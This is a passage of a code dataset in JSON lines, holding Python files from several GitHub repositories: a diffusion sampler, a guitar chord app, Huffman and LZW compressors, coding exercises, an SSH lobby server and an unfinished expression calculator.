+{"seq_id":"4295092609","text":"from abc import ABC, abstractmethod\n\nimport numpy as np\nimport torch as th\nimport torch.distributed as dist\n\n\ndef create_named_schedule_sampler(name, diffusion):\n\n if name == \"uniform\":\n return UniformSampler(diffusion)\n elif name == \"loss-second-moment\":\n return LossSecondMomentResampler(diffusion) #\n else:\n raise NotImplementedError(f\"unknown schedule sampler: {name}\")\n\n\nclass ScheduleSampler(ABC):\n\n @abstractmethod\n def weights(self):\n \"\"\"\n Get a numpy array of weights, one per diffusion step.\n\n The weights needn't be normalized, but must be positive.\n \"\"\"\n\n def sample(self, batch_size, device):\n\n w = self.weights()\n p = w / np.sum(w)\n indices_np = np.random.choice(len(p), size=(batch_size,), p=p)\n indices = th.from_numpy(indices_np).long().to(device)\n weights_np = 1 / (len(p) * p[indices_np])\n weights = th.from_numpy(weights_np).float().to(device)\n return indices, weights\n\n\nclass UniformSampler(ScheduleSampler):\n def __init__(self, diffusion):\n self.diffusion = diffusion\n self._weights = np.ones([diffusion.num_timesteps])\n\n def weights(self):\n return self._weights\n\n\nclass LossAwareSampler(ScheduleSampler):\n def update_with_local_losses(self, local_ts, local_losses):\n\n batch_sizes = [\n th.tensor([0], dtype=th.int32, device=local_ts.device)\n for _ in range(dist.get_world_size())\n ]\n dist.all_gather(\n batch_sizes,\n th.tensor([len(local_ts)], dtype=th.int32, device=local_ts.device),\n )\n\n # Pad all_gather batches to be the maximum batch size.\n batch_sizes = [x.item() for x in batch_sizes]\n max_bs = max(batch_sizes)\n\n timestep_batches = [th.zeros(max_bs).to(local_ts) for bs in batch_sizes]\n loss_batches = [th.zeros(max_bs).to(local_losses) for bs in batch_sizes]\n dist.all_gather(timestep_batches, local_ts)\n dist.all_gather(loss_batches, local_losses)\n timesteps = [\n x.item() for y, bs in zip(timestep_batches, batch_sizes) for x in y[:bs]\n ]\n losses = [x.item() for y, bs in zip(loss_batches, batch_sizes) for x in y[:bs]]\n self.update_with_all_losses(timesteps, losses)\n\n @abstractmethod\n def update_with_all_losses(self, ts, losses):\n \"\"\"\n Update the reweighting using losses from a model.\n\n Sub-classes should override this method to update the reweighting\n using losses from the model.\n\n This method directly updates the reweighting without synchronizing\n between workers. It is called by update_with_local_losses from all\n ranks with identical arguments. Thus, it should have deterministic\n behavior to maintain state across workers.\n\n :param ts: a list of int timesteps.\n :param losses: a list of float losses, one per timestep.\n \"\"\"\n\nclass LossSecondMomentResampler(LossAwareSampler):\n def __init__(self, diffusion, history_per_term=10, uniform_prob=0.001):\n self.diffusion = diffusion\n self.history_per_term = history_per_term\n self.uniform_prob = uniform_prob\n self._loss_history = np.zeros(\n [diffusion.num_timesteps, history_per_term], dtype=np.float64\n )\n self._loss_counts = np.zeros([diffusion.num_timesteps], dtype=np.int)\n\n def weights(self):\n if not self._warmed_up():\n return np.ones([self.diffusion.num_timesteps], dtype=np.float64)\n weights = np.sqrt(np.mean(self._loss_history ** 2, axis=-1))\n weights /= np.sum(weights)\n weights *= 1 - self.uniform_prob\n weights += self.uniform_prob / len(weights)\n return weights\n\n def update_with_all_losses(self, ts, losses):\n for t, loss in zip(ts, losses):\n if self._loss_counts[t] == self.history_per_term:\n # Shift out the oldest loss term.\n self._loss_history[t, :-1] = self._loss_history[t, 1:]\n self._loss_history[t, -1] = loss\n else:\n self._loss_history[t, self._loss_counts[t]] = loss\n self._loss_counts[t] += 1\n\n def _warmed_up(self):\n return (self._loss_counts == self.history_per_term).all()\n","repo_name":"Hxyz-123/Font-diff","sub_path":"utils/resample.py","file_name":"resample.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"76"} +{"seq_id":"43892594841","text":"import sqlite3\nimport Initialize\n\n\ndef main():\n conn = sqlite3.connect('main_database.db')\n c = conn.cursor()\n Initialize.init(conn)\n\n print(\"print rows\")\n get_launch_paths(c)\n\n update_path(conn, 'Steam', \"C:\\\\Program Files (x86)\\Steam\\\\steamapps\\\\common\")\n update_path(conn, 'Origin', \"C:\\\\Program Files(x86)\\\\Origin Games\")\n get_launch_paths(c)\n conn.close()\n\n\ndef update_path(conn, name, path):\n c = conn.cursor()\n sql = ''' UPDATE launchPaths\n SET path = ? \n WHERE name = ?'''\n c.execute(sql, (path, name))\n conn.commit()\n\n\ndef get_launch_paths(cursor):\n for row in cursor.execute('SELECT * FROM launchPaths'):\n print(row)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"TimKelleher81/GamesLauncher","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32568523356","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom pychord import find_chords_from_notes\nfrom pychord.analyzer import notes_to_positions\nimport Fretboard_ui\nfrom const import *\n\nclass ThreeNotes(Fretboard_ui.Fretboard_ui): # Inherit from Fretboard_ui.py\n def __init__(self, MainWindow):\n super().__init__(MainWindow)\n # Get objects define in Fretboard_ui.py\n ## The notes now playing\n self.component_notes = {stringNum: val['noteName'] for stringNum, val in OPEN_STRING_NOTE.items()}\n ## The strings now muted\n self.string_muted = {i:False for i in range(1, STRING_NUM + 1)}\n self.Horizon_lines = [vars(self)[f'line_{i}'] for i in range(HORIZON_LINES_INDEX_START, HORIZON_LINES_INDEX_END + 1)]\n self.Vertical_lines = [vars(self)[f'line_{i}'] for i in range(VERTICAL_LINES_INDEX_START, VERTICAL_LINES_INDEX_END + 1)]\n self.points = [vars(self)[f'label_{i}'] for i in range(POINTS_INDEX_START, POINTS_INDEX_END + 1)]\n self.initLinkLinesAndPoints(self.Horizon_lines, self.points)\n self.strings = self.initString(self.Horizon_lines)\n self.textBrowsers = [vars(self)[f'textBrowser_{i}'] for i in range(1, STRING_NUM + 1)]\n self.checkBoxs = [vars(self)[f'checkBox_{i}'] for i in range(1, STRING_NUM + 1)]\n\n # Mode\n self.mode = Mode.CHORD\n self.initNoteMode()\n\n # init UI\n self.initAllNoteName()\n # QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n ## reset button / mode button event\n self.resetButton.clicked.connect(self.resetEvent)\n self.modeButton.clicked.connect(self.modeChangeEvent)\n ## mute check box event\n for i in range(STRING_NUM):\n self.checkBoxs[i].stateChanged.connect(self.selectCheckBoxEvent(stringNum = i + 1))\n\n ######################## Init ########################\n\n def initLinkLinesAndPoints(self, lines: list, points: list):\n '''\n Link lines and points, and init the press event.\n '''\n for line, point in zip(lines, points):\n point.mousePressEvent = self.pointPressEvent(point)\n point.press = False\n point.hide()\n\n line.point = point\n line.mousePressEvent = self.linePressEvent(line)\n\n def initString(self, lines: list):\n '''\n Pack every twelve continuously adjacent horizon lines into a string.\n '''\n class String(list):\n def __init__(self):\n super().__init__()\n self.pressedPoint = None\n strings = []\n for string_idx in range(STRING_NUM):\n strings.append(String())\n for note_idx in range(NOTE_PER_STRING):\n idx = string_idx * NOTE_PER_STRING + note_idx\n line = lines[idx]\n line.point.stringNum = string_idx + 1\n strings[-1].append(line)\n return strings\n\n def initNoteMode(self):\n '''\n Init note Mode.\n '''\n self.notes = {note : list() for note in NOTES}\n self.noteModePressedPoints = list()\n for point in self.points:\n self.notes[point.noteName].append(point)\n\n def initAllNoteName(self):\n '''\n Set the initial note name of each string.\n '''\n for string_idx in range(1, STRING_NUM+1):\n noteName = OPEN_STRING_NOTE[string_idx]['noteName']\n pitchNum = OPEN_STRING_NOTE[string_idx]['pitchNum']\n self.setNoteName(string_idx, noteName, pitchNum)\n\n ######################## Utility ########################\n\n def pointPress(self, point):\n '''\n The helper function for pressing on fret.\n '''\n stringNum = point.stringNum\n string = self.strings[stringNum - 1]\n if not point.press:\n if string.pressedPoint and self.mode == Mode.CHORD:\n string.pressedPoint.hide()\n string.pressedPoint.press = False\n string.pressedPoint = point\n point.show()\n point.press = True\n noteName, pitchNum = point.noteName, point.pitchNum\n else:\n point.hide()\n point.press = False\n string.pressedPoint = None\n noteName = OPEN_STRING_NOTE[stringNum]['noteName']\n pitchNum = OPEN_STRING_NOTE[stringNum]['pitchNum']\n self.component_notes[stringNum] = noteName\n self.setNoteName(stringNum, noteName, pitchNum)\n self.checkChord()\n\n def checkChord(self):\n '''\n Check the notes now playing from string six to string one, \n sort by the distance to root note, and identify the chord by pychord.\n '''\n if self.mode == Mode.NOTE: # Note Mode don't need to show chord\n return\n def getNotesPosition(component_notes: list, root_note):\n notes_position = notes_to_positions(component_notes, root_note)\n for idx in range(len(notes_position)):\n notes_position[idx] %= len(NOTES) # 12 half steps a cycle\n return notes_position\n\n root_note = None\n component_notes = set() # pychord cannot accept duplicate notes\n for idx in range(STRING_NUM, 0, -1): # Order from string six to one to find root note\n if self.string_muted[idx]:\n continue\n if root_note == None:\n root_note = self.component_notes[idx]\n component_notes.add(self.component_notes[idx])\n component_notes = list(component_notes)\n notes_position = getNotesPosition(component_notes, root_note)\n\n _, component_notes = zip(*sorted(zip(notes_position, component_notes)))\n chord = find_chords_from_notes(component_notes)\n chordName = chord[0].chord if chord else ''\n self.setChordText(chordName)\n print(component_notes)\n print(chordName)\n \n def setChordText(self, chordName):\n '''\n Set the text in text browser by chord name.\n '''\n self.textBrowser_chord_identifier.setHtml(\"\\n\"\n \"\\n\"\n \"

    \"\n f\"{chordName}

    \")\n\n def setNoteName(self, stringNum, noteName, pitchNum):\n '''\n Set the note of string \"stringNum\" by noteName and pitchNum.\n '''\n if self.mode == Mode.NOTE: # Note Mode don't need to show pressed note name of the string\n return\n assert(0 < len(noteName) and len(noteName) < 3)\n s = f'{noteName[0]}'\n if len(noteName) == 2:\n s += f'{noteName[1]}'\n s += f'{pitchNum}'\n self.textBrowsers[stringNum-1].setHtml(\"\\n\"\n \"\\n\"\n \"

    \"\n f\"{s}

    \")\n\n ######################## Event Handler ########################\n\n def pointPressEventHelper(self, point):\n '''\n Press the different points by mode.\n\n Chord mode: Press the single point.\n Note mode: Press all the same notes, even in different pitch.\n '''\n if self.mode == Mode.CHORD:\n self.pointPress(point)\n elif self.mode == Mode.NOTE:\n self.resetEvent()\n same_note_points = self.notes[point.noteName]\n self.noteModePressedPoints = same_note_points\n for same_note_point in same_note_points:\n self.pointPress(same_note_point)\n\n def linePressEvent(self, line):\n '''\n Press on the line.\n '''\n def linePressEventWrapper(e):\n point = line.point\n self.pointPressEventHelper(point)\n return linePressEventWrapper\n\n def pointPressEvent(self, point):\n '''\n Press on the showed point.\n '''\n def pointPressEventWrapper(e):\n self.pointPressEventHelper(point)\n return pointPressEventWrapper\n\n def resetEvent(self):\n '''\n Reset to original state.\n '''\n self.component_notes = {stringNum: val['noteName'] for stringNum, val in OPEN_STRING_NOTE.items()}\n if self.mode == Mode.CHORD:\n for string in self.strings:\n if string.pressedPoint != None:\n point = string.pressedPoint\n self.pointPress(point)\n elif self.mode == Mode.NOTE:\n for point in self.noteModePressedPoints:\n self.pointPress(point)\n self.noteModePressedPoints = list()\n for idx in range(STRING_NUM):\n if self.string_muted[idx + 1]:\n self.checkBoxs[idx].click()\n self.checkChord()\n\n def modeChangeEvent(self):\n '''\n Change between Chord Mode and Note Mode.\n '''\n self.resetEvent()\n if self.mode == Mode.CHORD:\n self.mode = Mode.NOTE\n elif self.mode == Mode.NOTE:\n self.mode = Mode.CHORD\n self.modeButton.setText(self.mode.value)\n\n def selectCheckBoxEvent(self, stringNum):\n '''\n Mute specific string.\n '''\n def selectCheckBoxEventWrapper():\n self.string_muted[stringNum] = not self.string_muted[stringNum]\n self.checkChord()\n return selectCheckBoxEventWrapper\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = ThreeNotes(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"howardgood88/ThreeNotes","sub_path":"ThreeNotes.py","file_name":"ThreeNotes.py","file_ext":"py","file_size_in_byte":10551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"86451562362","text":"class Solution:\n def insert(self, head: 'Optional[Node]', insertVal: int) -> 'Node':\n if head == None:\n node = Node(insertVal)\n node.next = node\n return node\n\n ptr = head\n while ptr.next != head:\n if ptr.val <= ptr.next.val:\n if ptr.val <= insertVal <= ptr.next.val:\n break\n else:\n if insertVal <= ptr.next.val or insertVal >= ptr.val:\n break\n\n ptr = ptr.next\n\n node = Node(insertVal, ptr.next)\n ptr.next = node\n\n return head\n","repo_name":"kama1kant/coding-practice","sub_path":"leetcode/708_insert_into_a_sorted_circular_linked_list.py","file_name":"708_insert_into_a_sorted_circular_linked_list.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35374545606","text":"import io\n\n\"\"\"\n--Start huffman method--\n\"\"\"\n\n\nclass QueueNodes:\n nodes = []\n\n def addNode(self, element):\n \"\"\"\n Add node object to list\n :param element: node object to insert\n \"\"\"\n i = 0\n while i < len(self.nodes) and self.nodes[i].weight < element.weight:\n i += 1\n self.nodes.insert(i, element)\n\n def removeNode(self, index):\n \"\"\"\n Remove node object from list by index\n :param index: Integer index >=0\n \"\"\"\n del self.nodes[index]\n\n def getNode(self, index):\n \"\"\"\n Get node object by index\n :param index: Integer index >=0\n \"\"\"\n return self.nodes[index]\n\n def size(self):\n \"\"\"\n :return: size of list node objects\n \"\"\"\n return len(self.nodes)\n\n def __str__(self):\n \"\"\"\n String represent\n \"\"\"\n return \"[\" + ','.join(map(str, self.nodes)) + \"]\"\n\n\nclass Node:\n leftSon = None\n rightSon = None\n weight = 0\n character = ''\n binaryCode = ''\n\n def __init__(self, leftSon = None, rightSon = None, weight = 0, character = '', binaryCode = ''):\n \"\"\"\n\n :param leftSon: link to left node object\n :param rightSon: link to right node object\n :param weight: frequency of occurrence character\n :param character: char value\n :param binaryCode: string value\n \"\"\"\n self.leftSon = leftSon\n self.rightSon = rightSon\n if leftSon is not None and rightSon is not None:\n self.weight = leftSon.weight + rightSon.weight\n else:\n self.weight = weight\n self.character = character\n self.binaryCode = binaryCode\n return\n\n def isSheet(self):\n \"\"\"\n Checks whether the object is a sheet\n :return: bool\n \"\"\"\n return True if self.leftSon is None and self.rightSon is None else False\n\n def __str__(self):\n \"\"\"\n String represent\n \"\"\"\n return '(weight = {}, character = \\'{}\\', leftSon = {}, rightSon = {}, binaryCode = {})'.format(self.weight,\n self.character,\n self.leftSon,\n self.rightSon,\n self.binaryCode)\n\n\nclass DecodeTree:\n \"\"\"\n Decoded tree sample format\n\n {\n 'A' : '001',\n 'B' : '010'\n }\n \"\"\"\n decodedTree = {}\n usedNodes = {}\n\n model = ''\n\n position = 0\n\n def __init__(self, model):\n \"\"\"\n :param model: encoded binary tree string\n \"\"\"\n self.model = model\n\n def decodeTree(self, currentCode = ''):\n \"\"\"\n Decode character by binary codes\n :param currentCode: string binary codee\n \"\"\"\n if len(self.model) <= self.position:\n return\n\n character = self.model[self.position]\n\n if currentCode in self.usedNodes and self.usedNodes[currentCode] == 2:\n return\n\n if character is not '0':\n self.position += 1\n character = self.model[self.position]\n if currentCode is '':\n currentCode = '0'\n self.decodedTree[currentCode] = character\n self.usedNodes[currentCode] = 2\n\n while currentCode in self.usedNodes and self.usedNodes[currentCode] == 2 and len(currentCode) > 0:\n currentCode = currentCode[:-1]\n\n self.position += 1\n self.decodeTree(currentCode + '1')\n return\n self.position += 1\n\n self.decodeTree(currentCode + '0')\n self.usedNodes[currentCode] = 1\n\n self.decodeTree(currentCode + '1')\n self.usedNodes[currentCode] = 2\n\n\nclass EncodeTree:\n nodes = QueueNodes()\n\n sheets = {}\n\n model = ''\n\n def merge(self):\n \"\"\"\n Merge two first nodes with minimum weight\n \"\"\"\n leftSon = self.nodes.getNode(0)\n rightSon = self.nodes.getNode(1)\n self.nodes.removeNode(0)\n self.nodes.removeNode(0)\n self.nodes.addNode(Node(leftSon, rightSon))\n\n def addNode(self, node):\n \"\"\"\n :param node: node object to insert\n \"\"\"\n self.nodes.addNode(node)\n\n def buildTree(self, statisticDictionary):\n \"\"\"\n Create binary tree from dictionary with frequency of occurrence statistic\n\n :param statisticDictionary: dictionary where key is text's character and value is frequency of occurrence\n :return:\n \"\"\"\n for character, weight in statisticDictionary.items():\n self.addNode(Node(weight = weight, character = character))\n while self.nodes.size() > 1:\n self.merge()\n self.defineSheetsBinaryCode('', self.getRootNode())\n self.buildTreeEncodedModel(self.getRootNode())\n\n def getRootNode(self):\n \"\"\"\n :return: root node object\n \"\"\"\n return self.nodes.getNode(0)\n\n def defineSheetsBinaryCode(self, currentCode, node):\n \"\"\"\n Give binary code each node\n :param currentCode: string\n :param node: node object\n \"\"\"\n if node.isSheet():\n node.binaryCode = currentCode if currentCode is not '' else '0'\n self.sheets[node.character] = node.binaryCode\n return\n self.defineSheetsBinaryCode(currentCode + '0', node.leftSon)\n self.defineSheetsBinaryCode(currentCode + '1', node.rightSon)\n\n def buildTreeEncodedModel(self, node):\n \"\"\"\n Encode binary tree to string\n\n :param node: root node object\n \"\"\"\n if node.isSheet():\n self.model += \"1\" + node.character\n return\n else:\n self.model += \"0\"\n self.buildTreeEncodedModel(node.leftSon)\n self.buildTreeEncodedModel(node.rightSon)\n\n def __str__(self):\n \"\"\"\n String represent\n \"\"\"\n return str(self.nodes)\n\n\nclass FileWork:\n\n @staticmethod\n def getFileContent(fileName, encoding = \"UTF-8\"):\n \"\"\"\n Return string with file content\n\n :param encoding: file encoding\n :param fileName: string path to file\n :return: string file content\n \"\"\"\n file = io.open(fileName, mode = \"r\", encoding = encoding)\n text = file.read()\n file.close()\n return text\n\n @staticmethod\n def writeToFile(fileName, content, encoding = \"UTF-8\"):\n \"\"\"\n Write content to file\n\n :param content: file text content\n :param encoding: file encoding\n :param fileName: string path to file\n :return: string file content\n \"\"\"\n file = io.open(fileName, mode = \"w\", encoding = encoding)\n file.write(content)\n file.close()\n\n\nclass Statistic:\n statisticDictionary = {}\n\n def getStatisticFromFile(self, fileName):\n \"\"\"\n :param fileName: string file path\n :return: dictionary with frequency occurred statistic\n \"\"\"\n text = FileWork.getFileContent(fileName)\n for character in text:\n self.statisticDictionary[character] = (lambda character: self.statisticDictionary[\n character] if character in self.statisticDictionary else 0)(character) + 1\n return self.statisticDictionary\n\n\nclass HuffmanAlgorithm:\n\n @staticmethod\n def encodeHuffman(fileIn, fileOut, encoding = \"UTF-8\"):\n \"\"\"\n\n :param encoding: file encoding\n :param fileIn: string file path\n :param fileOut: string file path\n \"\"\"\n\n try:\n frequencyOccurredStatistic = Statistic()\n frequencyOccurredStatistic = frequencyOccurredStatistic.getStatisticFromFile(fileIn)\n\n tree = EncodeTree()\n tree.buildTree(frequencyOccurredStatistic)\n\n treeSheets = tree.sheets\n\n text = FileWork.getFileContent(fileIn, encoding)\n\n encodeResult = \"\"\n for character in text:\n encodeResult += treeSheets[character]\n\n separator = ' '\n\n encodeResult += separator + tree.model\n\n file = io.open(fileOut, mode = \"w\", encoding = encoding)\n file.write(encodeResult)\n file.close()\n return True\n except Exception:\n return False\n\n @staticmethod\n def decodeHuffman(fileIn, fileOut, encoding = \"UTF-8\"):\n \"\"\"\n\n :param encoding: file encoding\n :param fileIn: string file path\n :param fileOut: string file path\n \"\"\"\n try:\n file = io.open(fileIn, mode = \"r\", encoding = encoding)\n fileContent = file.read()\n fileContent = fileContent.split(' ', 1)\n\n treeModel = fileContent[1]\n text = fileContent[0]\n\n tree = DecodeTree(treeModel)\n tree.decodeTree()\n\n charactersBinaryCodes = tree.decodedTree\n\n currentCharacterCode = \"\"\n result = \"\"\n for character in text:\n currentCharacterCode += character\n if currentCharacterCode in charactersBinaryCodes:\n result += charactersBinaryCodes[currentCharacterCode]\n currentCharacterCode = \"\"\n\n file = io.open(fileOut, mode = \"w\", encoding = encoding)\n file.write(result)\n file.close()\n return True\n except Exception:\n return False\n\n\nif HuffmanAlgorithm.encodeHuffman(\"huffmanBest.txt\", \"huffmanEncodedBest.txt\"):\n print(\"All done. Huffman encoded\")\nelse:\n print(\"Huffman encoding error\")\n\nif HuffmanAlgorithm.decodeHuffman(\"huffmanEncodedBest.txt\", \"huffmanDecoded.txt\"):\n print(\"All done. Huffman decoded\")\nelse:\n print(\"Huffman decoding error\")\n\n\"\"\"\n--End huffman method--\n\"\"\"\n\n\"\"\"\n--Start LZW--\n\"\"\"\n\n\nclass LZWAlgorithm:\n\n @staticmethod\n def encodeLZ(fileIn, fileOut, dictionarySize = 1114112):\n \"\"\"\n Encode file content string to file\n\n :param fileIn: string path to file\n :param fileOut: string path to file\n :param dictionarySize: max UTF-8 char value\n \"\"\"\n try:\n fileContent = FileWork.getFileContent(fileIn)\n\n dictionary = {}\n for i in range(0, dictionarySize):\n dictionary[chr(i)] = i\n\n currentCode = dictionarySize\n\n encodedFileContent = \"\"\n buffer = fileContent[0]\n for pos in range(1, len(fileContent)):\n character = fileContent[pos]\n if (buffer + character) in dictionary:\n buffer += character\n else:\n dictionary[buffer + character] = currentCode\n currentCode += 1\n encodedFileContent += str(dictionary[buffer]) + \" \"\n buffer = character\n\n encodedFileContent += str(dictionary[buffer])\n\n FileWork.writeToFile(fileOut, encodedFileContent)\n return True\n except Exception:\n return False\n\n @staticmethod\n def decodeLZ(fileIn, fileOut, dictionarySize = 1114112):\n \"\"\"\n Decode file content from file\n\n :param fileIn: string path to file\n :param fileOut: string path to file\n :param dictionarySize: max UTF-8 char value\n \"\"\"\n try:\n fileContent = FileWork.getFileContent(fileIn)\n\n getCharByCode = {}\n getCodeByChar = {}\n\n for i in range(0, dictionarySize):\n getCharByCode[i] = chr(i)\n getCodeByChar[chr(i)] = i\n\n currentCode = dictionarySize\n\n fileContent = fileContent.split(' ')\n buffer = getCharByCode[int(fileContent[0])]\n decodeFileContent = \"\"\n for i in range(1, len(fileContent)):\n character = \"\"\n if int(fileContent[i]) in getCharByCode:\n character = getCharByCode[int(fileContent[i])]\n else:\n getCharByCode[currentCode] = buffer + buffer[0]\n getCodeByChar[buffer + buffer[0]] = currentCode\n currentCode += 1\n decodeFileContent += buffer\n character = buffer[0]\n\n if (buffer + character[0]) in getCodeByChar:\n buffer = buffer + character[0]\n else:\n getCharByCode[currentCode] = buffer + character[0]\n getCodeByChar[buffer + character[0]] = currentCode\n currentCode += 1\n decodeFileContent += buffer\n buffer = character\n decodeFileContent += buffer\n FileWork.writeToFile(fileOut, decodeFileContent)\n return True\n except Exception:\n return False\n\n\nif LZWAlgorithm.encodeLZ(\"LZWBest.txt\", \"LZWEncodedBest.txt\"):\n print(\"All done. LZW encoded\")\nelse:\n print(\"LZW encoding error\")\n\nif LZWAlgorithm.decodeLZ(\"LZWEncodedBest.txt\", \"LZWDecoded.txt\"):\n print(\"All done. LZW decoded\")\nelse:\n print(\"LZW decoding error\")\n\"\"\"\n--End LZW--\n\"\"\"\n\n","repo_name":"vovaksenov99/LZW-Huffman","sub_path":"LZW and Huffman.py","file_name":"LZW and Huffman.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40964075088","text":"list_of_strings = input().split(\", \")\ncount_of_beggars = int(input())\nfinal_list = []\ncounter_of_index = 0\nlist_of_digits = []\n\nfor element in list_of_strings:\n list_of_digits.append(int(element))\nwhile counter_of_index < count_of_beggars:\n sum_of_current_beggar = 0\n for current_index in range(counter_of_index, len(list_of_digits), count_of_beggars):\n sum_of_current_beggar += list_of_digits[current_index]\n counter_of_index += 1\n final_list.append(sum_of_current_beggar)\nprint(final_list)\n","repo_name":"Sindragossa/SoftUni","sub_path":"Programming_Fundamentals_with_Python/Lists_Basics_Exercise/number_beggars.py","file_name":"number_beggars.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3204440255","text":"import sys\n\nn = 6\nedge = [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]\n\ndef solution(n, edge):\n \n graph = [[] for _ in range(n+1)]\n dist = [0 for _ in range(n+1)]\n visited= [0 for _ in range(n+1)]\n\n for ed in edge:\n graph[ed[0]].append(ed[1])\n graph[ed[1]].append(ed[0])\n\n queue =[[1,0]]\n\n while queue:\n vertex,depth = queue.pop(0)\n\n if visited[vertex] == 0:\n dist[vertex] = depth\n visited[vertex] = 1\n for node in graph[vertex]:\n if visited[node] == 0:\n queue.append([node,depth+1])\n \n answer = dist.count(max(dist))\n return answer\n\nprint(solution(n, edge))\n\n","repo_name":"chosaihim/jungle_codingTest_study","sub_path":"JAN/25th/sh_가장먼노드.py","file_name":"sh_가장먼노드.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"457517094","text":"from google.appengine.ext import ndb\n\n\nclass Event(ndb.Model):\n tag = ndb.StringProperty()\n done = ndb.BooleanProperty()\n created = ndb.DateTimeProperty(auto_now_add=True)\n updated = ndb.DateTimeProperty(auto_now=True)\n\n @classmethod\n def create_or_update(cls, calendar_key, _id, tag, done=False):\n if not _id:\n raise ValueError('Invalid id for Event object.')\n\n event = cls.get_or_insert(_id, parent=calendar_key,\n tag=tag,\n done=done)\n if event.tag != tag or event.done != done:\n event.tag = tag\n event.done = done\n event.put()\n\n return event\n\n @classmethod\n def get_all(cls, calendar_key):\n return cls.query(ancestor=calendar_key)\n","repo_name":"slackpad/hashtagtodo","sub_path":"todo/models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"25056181877","text":"\nfrom __future__ import (\n absolute_import,\n print_function,\n)\nimport weakref\nfrom txsshsvr import (\n lobby,\n users,\n)\nfrom twisted.conch.recvline import HistoricRecvLine\nfrom twisted.conch.insults.insults import TerminalProtocol\nfrom twisted.python import log\nfrom textwrap import dedent\n\ndef makeSSHApplicationProtocol(reactor, user_id):\n proto = SSHApplicationProtocol()\n proto.reactor = reactor\n proto.user_id = user_id\n return proto\n\n\nclass SSHApplicationProtocol(TerminalProtocol):\n CTRL_D = '\\x04'\n reactor = None\n user_id = None\n\n def connectionMade(self):\n TerminalProtocol.connectionMade(self)\n self._init_app_protocol()\n\n def keystrokeReceived(self, keyID, modifier):\n if keyID == self.CTRL_D:\n self.terminal.loseConnection()\n elif keyID == 'R':\n self.app_protocol.update_display()\n else:\n self.app_protocol.handle_input(keyID, modifier)\n\n def terminalSize(self, width, height):\n log.msg(\"width: {}, height: {}\".format(width, height))\n\n def unhandledControlSequence(self, seq):\n log.msg(\"unhandled control seq.\")\n\n def _init_app_protocol(self):\n \"\"\"\n Initialize the application protocol.\n \"\"\"\n user_id = self.user_id\n entry = users.get_user_entry(user_id)\n need_init = False\n if entry.app_protocol is None:\n app_protocol = lobby.SSHLobbyProtocol()\n entry.app_protocol = app_protocol\n need_init = True\n app_protocol = entry.app_protocol\n app_protocol.reactor = self.reactor\n app_protocol.terminal = self.terminal\n app_protocol.user_id = self.user_id\n self.app_protocol = app_protocol\n app_protocol.parent = weakref.ref(self)\n if need_init:\n app_protocol.initialize()\n else:\n self.terminal.reset()\n app_protocol.update_display()\n\n def connectionLost(self, reason):\n pass\n\n","repo_name":"cwaldbieser/txsshlobby","sub_path":"txsshsvr/app_proto.py","file_name":"app_proto.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28259081352","text":"# Пока работает только с одной скобкой в выражении\n# Должен работать с любыми варианами +, -, *, / и в любом месте ()\n# надо вынести проверку на ( ) и расчет внутри ( ) в отдельную функцию, а результат записывать вместо скобки в тело списка m[]\n# после вновь проверять m[] на ( ) \n\n\n#________переменные_________________________\n\n# укажите выражение (после символа пробел обязателен!)\n#n = '12 + 15'\n#n = '12 + 15 - 4'\n#n = '12 - 4 * 2 + 6 / 3'\nn = '( 12 - 4 ) * 2' \n\nm = n.split()\nm2 = [] # применяется в вычислении * и / \nm3 = [] # применяется в решение выражения в скобках\n\nbracket = False # флаг скобки\nbracket_count = 0 # для подсчета знаков в скобке\nbracket_start = 0\nmultiply = False # флаг умножения/деления\nnew_object = True # флаг начала\ntemp = 0\n\n# _______вспомогательные функции____________\n\ndef calc_expression(a, b, oper):\n\tif oper == '+':\n\t\treturn (a + b)\n\tif oper == '-':\n\t\treturn (a - b)\n\tif oper == '*':\n\t\treturn (a * b)\n\tif oper == '/':\n\t\treturn (a / b)\n\t\t\ndef multiplication_calculation(m, multiply, new_object):\n# проверяем есть ли * или /\n for i in range(1, len(m) - 1, 2): # убрал len(m) - 1\n# выполняется если в выражении последующее действие * или /\n if m[i] == '*' and multiply == True or m[i] == '/' and multiply == True: \n temp = calc_expression(temp, int(m[i + 1]), m[i])\n m2.pop(-1) # удаляем последний знак\n m2.append(temp) # добавляем число\n multiply = True \n# выполняется если в выражении первое действие * или /\n elif m[i] == '*' and multiply == False or m[i] == '/' and multiply == False: \n if new_object == True: # если это начало то очистим массив\n m2.clear()\n new_object = False\n temp = calc_expression(int(m[i - 1]), int(m[i + 1]), m[i])\n m2.append(temp) # добавляем число\n multiply = True \n# выполняется после операций уножения или деления (если действие + или - после * или /)\n elif m[i] != '*' and multiply == True and i + 2 != len(m) or m[i] != '/' and multiply == True and i + 2 != len(m):\n multiply = False\n m2.append(m[i]) # просто ставлю знак\n# проверка начала выражения\n elif i == 1 and multiply == False: \n m2.clear() # сначало очистим массив\n new_object = False\n m2.append(int(m[0]))\n 